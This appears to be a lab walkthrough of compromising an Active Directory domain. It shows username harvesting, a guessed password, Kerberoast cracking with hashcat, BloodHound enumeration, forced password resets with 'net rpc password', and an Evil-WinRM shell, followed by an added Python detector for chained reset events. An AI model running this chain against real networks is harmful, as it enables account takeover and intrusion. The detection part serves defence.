Foothold
nagoya-industries.com
Matthew.Harrison
Emma.Miah
Rebecca.Bell
Scott.Gardner
Terry.Edwards
Holly.Matthews
Anne.Jenkins
Brett.Naylor
Melissa.Mitchell
Craig.Carr
Fiona.Clark
Patrick.Martin
Kate.Watson
Kirsty.Norris
Andrea.Hayes
Abigail.Hughes
Melanie.Watson
Frances.Ward
Sylvia.King
Wayne.Hartley
Iain.White
Joanna.Wood
Bethan.Webster
Elaine.Brady
Christopher.Lewis
Megan.Johnson
Damien.Chapman
Joanne.Lewis
Verify usernames
fiona.clark:Summer2023
svc_helpdesk
svc_mssql
svc_tpl
svc_web
❯ hashcat -m 13100 kereroast.hash ~/rockyou.txt -O --show
...
svc_mssql:Service1
...
svc_mssql:Service1
svc_web:Service1
❯ bloodhound-python -d nagoya-industries.com -u fiona.clark -p Summer2023 -ns 192.168.246.21 -c all
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
INFO: Found AD domain: nagoya-industries.com
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (nagoya.nagoya-industries.com:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: nagoya.nagoya-industries.com
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: nagoya.nagoya-industries.com
INFO: Found 36 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: nagoya.nagoya-industries.com
INFO: Done in 00M 08S
❯ python targetedKerberoast.py -v -d nagoya-industries.com -u fiona.clark -p Summer2023
❯ hashcat -m 13100 targeted.hash ~/rockyou.txt -O
Couldn't crack anything. Change the password instead.
❯ net rpc password "Bethan.Webster" 'Pwned123!' -U nagoya-industries.com/fiona.clark%Summer2023 -S dc.nagoya-industries.com
❯ net rpc password "Christopher.Lewis" 'Pwned123!' -U nagoya-industries.com/Bethan.Webster%'Pwned123!' -S dc.nagoya-industries.com
❯ evil-winrm -i 192.168.246.21 -u Christopher.Lewis -p Pwned123!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> whoami ; type C:\local.txt ; ipconfig
nagoya-ind\christopher.lewis
fe51542372fe3fdfb29cae954902c311
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.246.21
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.246.254
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents>
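A defender's view of the two chained `net rpc password` resets above, as an added example that is not part of the original write-up: a reset performed by another account is logged on the domain controller as Security Event ID 4724, and an account that is reset and then resets a different account shortly afterwards is the pattern worth alerting on. The event records, timestamps, the `helpdesk.admin` account, the function name and the 30-minute window are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample of Event ID 4724 records ("An attempt was made to reset
# an account's password"), reduced to the fields used here. Timestamps and
# the helpdesk.admin account are invented; other names follow the walkthrough.
EVENTS = [
    {"time": "2024-01-10T09:02:11", "subject": "helpdesk.admin", "target": "Joanna.Wood"},
    {"time": "2024-01-10T14:31:05", "subject": "fiona.clark", "target": "Bethan.Webster"},
    {"time": "2024-01-10T14:33:40", "subject": "bethan.webster", "target": "Christopher.Lewis"},
    {"time": "2024-01-11T08:15:00", "subject": "Joanna.Wood", "target": "Iain.White"},
]


def find_reset_chains(events, window=timedelta(minutes=30)):
    """Return (first, second) event pairs where the account whose password was
    reset in `first` resets another account in `second` within `window`."""
    parsed = sorted(
        ({**e, "time": datetime.fromisoformat(e["time"])} for e in events),
        key=lambda e: e["time"],
    )
    last_reset = {}  # lowercased account name -> latest event that reset it
    chains = []
    for ev in parsed:
        # AD account names are case-insensitive, so compare lowercased.
        subject, target = ev["subject"].lower(), ev["target"].lower()
        if subject == target:
            continue  # ignore records where an account acts on itself
        prior = last_reset.get(subject)
        if prior and ev["time"] - prior["time"] <= window:
            chains.append((prior, ev))
        last_reset[target] = ev
    return chains


if __name__ == "__main__":
    for first, second in find_reset_chains(EVENTS):
        gap = second["time"] - first["time"]
        print(f"{first['subject']} -> {first['target']} -> {second['target']} "
              f"(second reset {gap} after the first)")
```

The helpdesk reset of `Joanna.Wood` is not flagged by default because her own reset action falls outside the window; widening the window trades fewer misses for more noise from routine helpdesk activity.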